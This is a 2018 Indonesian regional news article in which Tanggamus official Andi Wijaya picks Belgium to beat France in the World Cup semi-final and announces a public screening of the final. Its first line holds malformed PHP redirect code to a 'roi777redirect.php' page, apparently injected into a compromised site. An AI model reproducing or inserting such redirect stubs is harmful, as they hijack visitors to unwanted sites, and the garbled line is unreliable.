header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Prancis Kontra Belgia, Sekda Tanggamus Jagokan Belgia -
Prancis Kontra Belgia, Sekda Tanggamus Jagokan Belgia

Sekretaris Daerah Tanggamus,

Hi. Andi Wijaya, S.T., M.M.

 

TRANSLAMPUNG.COM, TANGGAMUS – Rabu (11/7) dini hari, gelaran Piala Dunia (World Cup) 2018 memasuki babak semi final. Kompetisi sepak bola bergengsi lima tahunan tersebut mempertemukan dua negara dari Benua Eropa. Prancis kontra Belgia. Dalam skema pertandingan tersebut, Sekretaris Daerah Hi. Andi Wijaya, S.T., M.M. menjagokan Belgia.

Andi Wijaya adalah seorang atlet. Namun dia mengaku bukan maniak sepak bola, melainkan maniak olahraga bela diri. Pun demikian, bukan berarti Sekda Tanggamus anti-sepak bola. Meski hanya mengimbangi pergaulan, namun sedikit banyak, Andi Wijaya tetap update mengikuti progres World Cup 2018 yang berlangsung di Rusia.

Prediksi Sekda Tanggamus menjagokan negara di bagian barat Eropa dan beribukota Brussels itu dalam laga semi final dini hari nanti, bukan tanpa alasan. Menurutnya, Prancis adalah negara yang sejak dulu melahirkan bintang-bintang lapangan hijau dunia.

“Dari track record prestasi, Prancis luar biasa dan itu usah diragukan lagi. Namun bagi saya, dalam sebuah pertandingan yang terpenting adalah kesiapan energi dan mental untuk menghadapi pertandingannya sendiri. Dan menurut saya, Belgia punya energi itu,” ungkap Andi Wijaya saat dihubungi translampung.com via nomor ponsel pribadinya, tadi (10/7) siang.

Sebagai atlet bela diri campuran yaitu taekwondo, karate, dan silat, Sekda Tanggamus punya analogi sendiri untuk memprediksi laga semi final pukul 01.00 WIB nanti di St. Pietersburg Stadium. Tak lain, analogi yang diambil Andi Wijaya, sesuai dengan background-nya sebagai atlet bela diri.

“Maksud saya begini, Prancis dengan nama besarnya seperti seorang atlet bela diri sabuk hitam. Sedangkan Belgia bagaikan atlet sabuk putih. Namun di atas matras, semua kemungkinan bisa terjadi. Atlet bersabuk hitam, bisa saja kalah dengan lawannya yang hanya sabuk putih yang memiliki energi dan siap menjadi juara. Itu maksudnya. Dalam sebuah pertandingan, saya adalah orang yang tidak pernah berpatokan pada besarnya sebuah negara atau besarnya sebuah tim,” ungkap Andi Wijaya.

Ketika ditanya prediksi skor, Sekda Tanggamus enggan menjawabnya. Namun dia memprediksikan Belgia akan mampu menjegal langkah Prancis menuju babak final.

Pemkab Tanggamus Gelar Nobar Final World Cup di Taman Kota

DITANYA lebih lanjut soal agenda nonton bareng (nobar) World Cup 2018, Sekda Tanggamus Andi Wijaya juga menuturkan, bahwa pemkab akan menggelar nobar saat laga final, Senin (16/7) mendatang.

“Oya, jangan lupa datang ya ke nobar Pemkab Tanggamus. Kita buat waktu final besok. Lokasinya di Ruang Terbuka Hijau Ir. Soekarno (Taman Kota Kotaagung, Red). Kalau sekarang ini, memang belum ada (nobar). Laga final baru ada,” tandas Andi Wijaya. (ayp)

 

News Reporter